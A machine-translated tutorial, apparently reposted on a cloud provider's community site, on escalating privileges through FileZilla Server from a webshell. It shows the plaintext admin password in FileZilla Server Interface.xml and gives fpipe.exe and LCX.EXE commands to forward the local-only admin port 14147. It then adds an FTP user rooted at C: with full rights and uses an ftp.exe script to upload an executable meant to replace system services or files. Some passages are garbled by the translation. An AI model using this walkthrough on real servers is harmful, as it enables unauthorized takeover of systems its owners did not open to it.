Twists and turns FileZilla Server Elevation of Privilege

Source: Internet
Author: User
Tags filezilla

Comments: After understanding the above three points, we are trying to connect to the FileZilla Server on the Server. First, check the content in FileZilla Server Interface. xml. First, clarify the following three elements:
1. FileZilla Server installation path, which provides conditions for obtaining the FileZilla Server Interface. xml file.
2. The local FileZilla Server must be compatible with the Server version. Otherwise, the system will prompt that the version is different and the Protocol is incorrect.
3. The FileZilla Server Interface. xml file in FileZilla Server saves the management password.
After understanding the above three points, we are trying to connect to the FileZilla Server on the Server.
First, check the content in FileZilla Server Interface. xml.

The Code is as follows:
<FileZillaServer>
<Settings>
<Item name = "Last Server Address" type = "string"> 127.0.0.1 </Item>
<Item name = "Last Server Port" type = "numeric"> 14147 </Item>
<Item name = "Last Server Password" type = "string"> qwertyu </Item>
<Item name = "Always use last server" type = "numeric"> 0 </Item>
<Item name = "User Sorting" type = "numeric"> 0 </Item>
</Settings>
</FileZillaServer>

Name = "Last Server Address" type = "string"
127.0.0.1 is the Server IP address, which is defined as 127.0.0.1 bound to the local device by default. It is not bound to 0.0.0.0, so it can only be connected locally.
Name = "Last Server Port" type = "numeric"
14147 is the FileZilla Server Management connection port. The default value is 14147.
Name = "Last Server Password" type = "string"
Qwertyu is the management password. Here the password is customized during installation. To obtain the password in this file, you must check the Save Password option in the configuration.
Now let's talk about how to deal with the BT situation.
The Server is only open to external users, and the permission is webshell. The only third-party software installed on the Server is FileZilla Server. Database is Ms-SQL2005, no Systemadmin permission account, existing database account is DB permission, prohibit all database-related backup function.
Test the network environment and open 80 to the outside. In the shell, netstat-an shows three external ports: 14147 and. Test showed that all except port 80 could not be connected.
In the above cases, only FileZilla Server can be used to obtain Server permissions. Of course, from the external perspective, the server is indeed very good, but from the internal perspective, it is still a good choice. First, clarify the first purpose. The first thing to do is to obtain the management permissions of the FileZilla Server. However, the Management port of the FileZilla Server is bound to 127.0.0.1: 14147, which cannot be accessed externally.
To obtain external access permissions, we can use LCX developed by LCX. EXE port bounce forwarding program implementation, but in the actual test, it was found that FileZilla Server has very high requirements for the network environment, which is also caused by the FileZilla Server access protocol, directly using LCX. EXE Forwarding is extremely unstable (the test cannot be connected in the optical fiber environment ). In addition, the only FileZilla serverprivilege tutorial on the Internet mentioned the fpipe.exe program. The FPipe.exe program is developed to implement the port forwarding function. It can be used to forward local port listening data. In the current condition, even if the locally bound port is forwarded to an external port, it cannot be connected. It is estimated that it is a hardware defense.
Now, we can know that the environment is the ultimate path. The path to the breakthrough is the development. My path is to use fpipe.exe to forward port 14147 to other external ports, and then use LCX. EXE to forward the fpipe.exe port. FPipe.exe-v-l 1234-r 14147 127.0.0.1. Local LCX. EXE-LISTEN 1234. LCX. EXE-SLAVE local IP address 1234 Server IP address 1234 on the server. In this way, local connections can be achieved, but the network environment is still very demanding.
Then, the FileZilla Server is managed locally, and an FTP user is added. The user directory is set to C: to check all permission operation options. FileZilla Server adds FTP users.
The problem is that the permission is elevated. FileZilla Server is no better than serv-U. You can use quote site exec to execute the doscommand (I don't know whether it works or other parameters can be implemented, but I don't understand ...) to achieve Elevation of Privilege, you can log on to FTP to perform file management, such as replacing system services, replacing system files, and placing programs in the startup directory.
The problem is that port 21 is opened on the server, but external access is not allowed. FTP port forwarding is also unstable and can be easily disconnected. Now, you can log on to the FTP server directly from the server. Bounce a mongoshell and write an ftp automatic processing script
Open 127.0.0.1 21
User
Pass
Put soft.exe directory
Bye
Then, you can upload the ftp.exe-s: ftp.txt file locally. In this case, you can use the FileZilla Server to enhance the permissions.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.